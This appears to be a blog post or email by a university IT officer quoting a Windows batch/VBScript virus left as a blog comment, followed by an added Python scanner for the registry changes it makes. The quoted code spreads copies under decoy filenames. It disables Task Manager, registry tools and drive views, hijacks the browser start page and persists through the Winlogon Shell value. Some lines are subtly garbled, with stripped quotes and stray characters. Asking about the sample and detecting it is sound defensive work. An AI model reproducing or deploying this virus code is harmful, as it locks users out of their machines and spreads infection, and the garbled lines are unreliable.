This morning I checked my blog (http://sandynata.wordpress/com) and it turns out someone had sent a comment like this:
redrevolt | [EMAIL PROTECTED] | jancok.com | IP: 69.88.4.120 72.232.131.22040.322

@echo off
If exist c:\windows\exploler.exe Goto lanjut
for %%a in (*.exe) do if %%~za equ 123456 copy %%a %systemroot%\exploler.exe
copy c:\windows\exploler.exe c:\rahasia gua.exe
echo on error resume next>c:\windows\gila.vbs
echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs
echo set WshShell = CreateObject(Wscript.Shell)>>c:\windows\gila.vbs
echo set fso = CreateObject(Scripting.FileSystemObject)>>c:\windows\gila.vbs
echo set f1 = fso.GetFile(C:\WINDOWS\exploler.exe)>>c:\windows\gila.vbs
echo set f2=fsoGetFile(C:\windows\gila.vbs)>>c:\windows\gila.vbs
echo f1.Attributes = 3?>>c:\windows\gila.vbs
echo f2.Attributes =3>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives, 29?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive, 29?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools, 1?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr, 1?, REG_DWORD>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page, http://fanaticanz.blogspot.com, REG_SZ>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, Explorer.exe C:\WINDOWS\exploler.exe, REG_SZ>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, rastaman, REG_SZ>>c:\windows\gila.vbs
echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, fanatiCanz, REG_SZ>>c:\windows\gila.vbs

:lanjut
call c:\windows\gila.vbs
if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki
for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe %%d
Goto ceki

:infek1
for %%a in (*.exe) do if %%~za equ 12345 copy %%a %systemroot%\exploler.exe
Goto ceki

:infek2
Copy c:\windows\exploler.exe c:\gambar lucu.exe
Goto ceki

:infek3
Copy c:\windows\exploler.exe f:\koleksi kartun flash.exe
Goto ceki

:cekf
if exist f:\koleksi kartun flash.exe Goto ceki
Goto infek3

:ceki
if not exist c:\windows\exploler.exe Goto infek1
if not exist c:\gambar lucu.exe Goto infek2
if exist f:\ Goto cekf

Goto ceki

--

Is this really the modus operandi (source code) of a virus?

This comment appeared on my blog, on the article
http://sandynata.wordpress.com/2007/01/22/cara-mengatasi-virus-mr-coolface-in-javanese/

For now I am not displaying the comment, to avoid anything unwanted.

--
Best Regards,

Sandy Suryadinata
--------------------------------------------
Department of UTI (Unit Teknologi Informasi)
2nd Floor, J - Building,
Malangkucecwara School of Economics
Phone : +62 341 491813 - Ext. 125, 127
http://www.stie-mce.ac.id
--------------------------------------------
blog + http://sandynata.wordpress.com
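
A defender-side check for the registry changes named in the quoted comment, as an added example that is not part of the original mail: it scans the text of a `reg export` (.reg format) for the policy lock-outs and the Winlogon Shell change. The function names and the sample input are constructed for illustration, and the caller is assumed to have decoded the export file to text first.

```python
import re
# Policy values the quoted script sets via RegWrite (names taken from the comment).
POLICY_VALUES = {
    r"policies\explorer": {"NoRun", "NoDrives", "NoViewOnDrive", "NoFolderOptions", "NoFind"},
    r"policies\system": {"DisableRegistryTools", "DisableTaskMgr"},
}
WINLOGON = r"windows nt\currentversion\winlogon"

def drives_from_mask(mask):
    """Decode a NoDrives/NoViewOnDrive bitmask (bit 0 = A:, bit 1 = B:, ...)."""
    return [chr(ord("A") + i) for i in range(26) if mask >> i & 1]

def scan_reg_export(text):
    """Return findings from .reg-format text; key and value names match case-insensitively."""
    findings, key = [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()          # remember the current registry key
            continue
        m = re.match(r'"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")$', line)
        if not m:
            continue                          # header, blank line or other value type
        name, dword, string = m.group(1), m.group(3), m.group(4)
        for suffix, names in POLICY_VALUES.items():
            if key.endswith(suffix) and name in names and dword and int(dword, 16) != 0:
                value = int(dword, 16)
                detail = f"{name}={value}"
                if name in ("NoDrives", "NoViewOnDrive"):
                    detail += " (drives " + ",".join(drives_from_mask(value)) + ")"
                findings.append(detail)
        if key.endswith(WINLOGON) and name.lower() == "shell" and string is not None:
            shell = string.replace("\\\\", "\\").strip().lower()
            if shell != "explorer.exe":       # anything appended to the shell is suspect
                findings.append(f"Shell={shell}")
    return findings

# Constructed sample, not taken from a real machine.
SAMPLE = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoDrives"=dword:0000001d
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe C:\\WINDOWS\\exploler.exe"
'''
if __name__ == "__main__":
    print("\n".join(scan_reg_export(SAMPLE)))
```

The value 29 written to NoDrives and NoViewOnDrive decodes to drives A, C, D and E, which is why those drives disappear from Explorer on an affected account.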
